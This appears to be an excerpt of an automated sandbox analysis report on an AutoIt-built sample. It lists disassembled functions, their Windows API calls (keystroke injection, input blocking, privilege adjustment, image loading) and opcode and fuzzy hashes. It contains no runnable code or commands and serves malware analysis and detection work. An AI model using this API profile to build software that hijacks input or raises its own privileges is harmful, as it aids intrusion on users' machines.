                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ErrorFormatLastMessage
                • String ID:
                • API String ID: 3479602957-0
                • Opcode ID: 4b3cdf90a0c776de3e23f2fec815de1db5a2078d304327bee7e9d547b79392a5
                • Instruction ID: 0a1b44cdc347ca9a5384695a555b915eee97b53ad589edf4679c16010f42cad1
                • Opcode Fuzzy Hash: 4b3cdf90a0c776de3e23f2fec815de1db5a2078d304327bee7e9d547b79392a5
                • Instruction Fuzzy Hash: 71F0E5B06042287AEB2027668C4DFEB3AAEEFC5B61F000175F519D2281DA609A44CBF0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0017B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                Download Yara Rule
                APIs
                • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0017B25D
                • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 0017B270
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: InputSendkeybd_event
                • String ID:
                • API String ID: 3536248340-0
                • Opcode ID: a9b35c878199edc7599c7c9e3444b8ad099d07ab4f48fc98544f4283f8251af8
                • Instruction ID: 6c2d5cf1c49d32f687f32ea1df111b652ff3db79c703c020608ca0293aeab9de
                • Opcode Fuzzy Hash: a9b35c878199edc7599c7c9e3444b8ad099d07ab4f48fc98544f4283f8251af8
                • Instruction Fuzzy Hash: 60F0177190428EABDB059FA0C806BBE7BB4FF09309F00800AF965A61A2C37996519F94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001710BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                Download Yara Rule
                APIs
                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001711FC), ref: 001710D4
                • CloseHandle.KERNEL32(?,?,001711FC), ref: 001710E9
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: AdjustCloseHandlePrivilegesToken
                • String ID:
                • API String ID: 81990902-0
                • Opcode ID: ca149d180d8d2f0a51fee0d740161b62514dc1c68fa8872a51c50829851a1b49
                • Instruction ID: 0086281afff62abdd3c3beec7d83431302b4de3a426bb68f8a60ae0a6c3b310c
                • Opcode Fuzzy Hash: ca149d180d8d2f0a51fee0d740161b62514dc1c68fa8872a51c50829851a1b49
                • Instruction Fuzzy Hash: 1DE04F32004610BEE7252B51FC05F7377B9EF04310F10882DF4A6804B1DB626CE0DB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0011CAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON
                Download Yara Rule
                Strings
                • Variable is not of type 'Object'., xrefs: 00160C40
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID:
                • String ID: Variable is not of type 'Object'.
                • API String ID: 0-1840281001
                • Opcode ID: 0942456a6558ea424438eb186dd5cf6712f911540f0117c2d84831e062701848
                • Instruction ID: 20bf6184b9790bb8d1c272313ac53b1f4ca38dc23d80f74f1d17a71cc6a005b0
                • Opcode Fuzzy Hash: 0942456a6558ea424438eb186dd5cf6712f911540f0117c2d84831e062701848
                • Instruction Fuzzy Hash: 6A32C230940219DFCF18DF94D881BEEB7B5FF19304F148069E806AB292D775AE86CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0014676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00146766,?,?,00000008,?,?,0014FEFE,00000000), ref: 00146998
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ExceptionRaise
                • String ID:
                • API String ID: 3997070919-0
                • Opcode ID: 8a2bbb79f57aa8c1c0c97277f1090ff51414096cd3f29345211601539bb42cbb
                • Instruction ID: dae69a18ec6ad19150d4e3153244900f290986fca6fe414c9badfd606f7a77e6
                • Opcode Fuzzy Hash: 8a2bbb79f57aa8c1c0c97277f1090ff51414096cd3f29345211601539bb42cbb
                • Instruction Fuzzy Hash: 50B15B71610609DFD719CF28C48ABA57BE0FF46368F258658E899CF2B2C335E991CB41
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0012B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID: 0-3916222277
                • Opcode ID: 3a5c31c615a260daf24264ea05d06c4720845677163c7a3d609235440c4917a3
                • Instruction ID: 61353ad46d9b7ac2154f37854e0ecaf2df539c7da1a6d71fea68ff533e5f5c8b
                • Opcode Fuzzy Hash: 3a5c31c615a260daf24264ea05d06c4720845677163c7a3d609235440c4917a3
                • Instruction Fuzzy Hash: 68127E71D042299FCB24DF58D8806EEB7F5FF48310F1581AAE849EB255EB309E91CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0018EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                Download Yara Rule
                APIs
                • BlockInput.USER32(00000001), ref: 0018EABD
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: BlockInput
                • String ID:
                • API String ID: 3456056419-0
                • Opcode ID: b348930500b1791c7d3b3e00858c0b15479502224278aa7701932c4923048980
                • Instruction ID: 50084c71bda2b10f480d8556c76b2cef3b945a81e84a7f50e560a86801aeb2e2
                • Opcode Fuzzy Hash: b348930500b1791c7d3b3e00858c0b15479502224278aa7701932c4923048980
                • Instruction Fuzzy Hash: E3E04F312002049FC714EF59D844E9AF7E9AFA8760F008426FC49C7351DB70E9818F90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001309D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                Download Yara Rule
                APIs
                • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,001303EE), ref: 001309DA
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: 262c88bbe4ba5d634470bc18f33c244efa168705cc96ee830844eff09fab1f96
                • Instruction ID: 835ec74894ef9e680c7c439bf9c32606205dd093cb24849b3f41c9aff16d5ade
                • Opcode Fuzzy Hash: 262c88bbe4ba5d634470bc18f33c244efa168705cc96ee830844eff09fab1f96
                • Instruction Fuzzy Hash:
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0013781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID:
                • String ID: 0
                • API String ID: 0-4108050209
                • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                • Instruction ID: cd62ef53f01191050a66d5392e28cfabff8a5fb902ed34a28a8e3d36a6f1f571
                • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                • Instruction Fuzzy Hash: 1A51ABF160C745ABDF3C8638885EBBE67C99B12364F180A89E986D73C2C715DE01D352
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00146DD9 Relevance: .6, Instructions: 637COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 48944a2cc04bbb3ef9ea1e50698e2b4a37e4a17da2c2872a88a58e3826439875
                • Instruction ID: 42436326c13971da25516b7517213d97acee36ff54d089590f129d100315facd
                • Opcode Fuzzy Hash: 48944a2cc04bbb3ef9ea1e50698e2b4a37e4a17da2c2872a88a58e3826439875
                • Instruction Fuzzy Hash: 7A32F222D29F414DDB239635D822336A689AFB73C5F15D737E81AB9DB9EB29C4C34100
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0012CC39 Relevance: .6, Instructions: 635COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 32264f2c1469ba308d6e4a8a9d7f58447cba79764fda505affd300bbf0a364a3
                • Instruction ID: bd0f628affed37258399152b361e4d48f098f594a06454c7b599859989835d00
                • Opcode Fuzzy Hash: 32264f2c1469ba308d6e4a8a9d7f58447cba79764fda505affd300bbf0a364a3
                • Instruction Fuzzy Hash: 9D32F331A001658BCF28CE69DC9467D7BA1EB45310F29816AD9DACB791E3309EB1DBC1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00117920 Relevance: .6, Instructions: 563COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 027fd27906e55c0988767b83ffb8acc744ba2980b26ea6071cd8023d1c77dd4d
                • Instruction ID: d7380b2bdc47f07401d7ecbd9e4afc86671a40d36180b88204506283d0efa31f
                • Opcode Fuzzy Hash: 027fd27906e55c0988767b83ffb8acc744ba2980b26ea6071cd8023d1c77dd4d
                • Instruction Fuzzy Hash: 5622CF70A04609DFDF18CF64D891AEEB7B6FF54300F244139E826AB291EB369995CB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001191C0 Relevance: .5, Instructions: 475COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9f85561cf462b41bc6efd3ec3c5833ecb59af31b482a76d642d08fe35eb4f8a8
                • Instruction ID: 2192e781dd80856a6aaa3dd4e4f222c36a068d2c87c78c67584645b425a63173
                • Opcode Fuzzy Hash: 9f85561cf462b41bc6efd3ec3c5833ecb59af31b482a76d642d08fe35eb4f8a8
                • Instruction Fuzzy Hash: 1A02D6B1E00109EBDB08DF64D881AAEB7F5FF54300F118169E826DB290E731EA65CB81
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00137A4A Relevance: .2, Instructions: 237COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9f9ffad6fbb1f86acd6259858823b3f31103be59ac5eeac086e21f49ed1f6c60
                • Instruction ID: be77b74e309b59bff494ad487ab80b0583cdb1ea314df49938c15096c627c3c1
                • Opcode Fuzzy Hash: 9f9ffad6fbb1f86acd6259858823b3f31103be59ac5eeac086e21f49ed1f6c60
                • Instruction Fuzzy Hash: 196149F120874AA6EE38AA2C8C95BBEB3A4DF51700F18091EF843DB2C5D7119E42C355
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00137CA7 Relevance: .2, Instructions: 237COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e7e9acf84ae9da34ee7d6fda3cca345798553b9263508221b167974d8b5d0388
                • Instruction ID: e3dc4867e335a39b55ac8f1ca56a48b933b21b63f5a6c54ecab07c53bed79293
                • Opcode Fuzzy Hash: e7e9acf84ae9da34ee7d6fda3cca345798553b9263508221b167974d8b5d0388
                • Instruction Fuzzy Hash: 7E619CF120C70967DE399AA89892BBF6398EF52744F100969F843DB2C1DB12DD46C355
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01A83690 Relevance: .1, Instructions: 92COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.3890372011.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a80000_GVV.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                • Instruction ID: 22f302c90e1c685ddfa4e422500b2b735752d1aa87308aa91e9f9cada24833b3
                • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                • Instruction Fuzzy Hash: FE41D371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00182046 Relevance: .1, Instructions: 72COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d34b1299d6df939d7bb121f5ecd6e248002fb0561430d3efd0ca4b4c80536686
                • Instruction ID: 8b8d87fc80ca870a37a014539e836362be38b8bc2324024d7a7555805c30dc1b
                • Opcode Fuzzy Hash: d34b1299d6df939d7bb121f5ecd6e248002fb0561430d3efd0ca4b4c80536686
                • Instruction Fuzzy Hash: F421BB326206518BDB28CF79C86367E73E9A754310F15862EF4A7C77D0DE75A944CB80
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01A83520 Relevance: .0, Instructions: 35COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.3890372011.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a80000_GVV.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                • Instruction ID: da74d8dbca60634242b42ad43c017aa8a1f3748c941781f5a9a4fadf0cb46c44
                • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                • Instruction Fuzzy Hash: 00019278A00109EFCB48EFA8C6909AEF7B5FF48710F208599D909A7301E730EE41DB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01A83580 Relevance: .0, Instructions: 35COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.3890372011.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a80000_GVV.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                • Instruction ID: 04f1bcb321cc879d1198f88fb7819d8e70b4e28f27e695ac2b2df57a895741cd
                • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                • Instruction Fuzzy Hash: 5D019278A00109EFCB48EFA8C5909AEF7B5FF48710F208599D909A7301D730EE41DB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01A81F00 Relevance: .0, Instructions: 6COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.3890372011.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a80000_GVV.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00192ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                Download Yara Rule
                APIs
                • DeleteObject.GDI32(00000000), ref: 00192B30
                • DeleteObject.GDI32(00000000), ref: 00192B43
                • DestroyWindow.USER32 ref: 00192B52
                • GetDesktopWindow.USER32 ref: 00192B6D
                • GetWindowRect.USER32(00000000), ref: 00192B74
                • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00192CA3
                • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00192CB1
                • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00192CF8
                • GetClientRect.USER32(00000000,?), ref: 00192D04
                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00192D40
                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00192D62
                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00192D75
                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00192D80
                • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00192D89
                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00192D98
                • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00192DA1
                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00192DA8
                • GlobalFree.KERNEL32(00000000), ref: 00192DB3
                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00192DC5
                • OleLoadPicture.OLEAUT32(?,00000000,00000000,001AFC38,00000000), ref: 00192DDB
                • GlobalFree.KERNEL32(00000000), ref: 00192DEB
                • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00192E11
                • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00192E30
                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00192E52
                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0019303F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
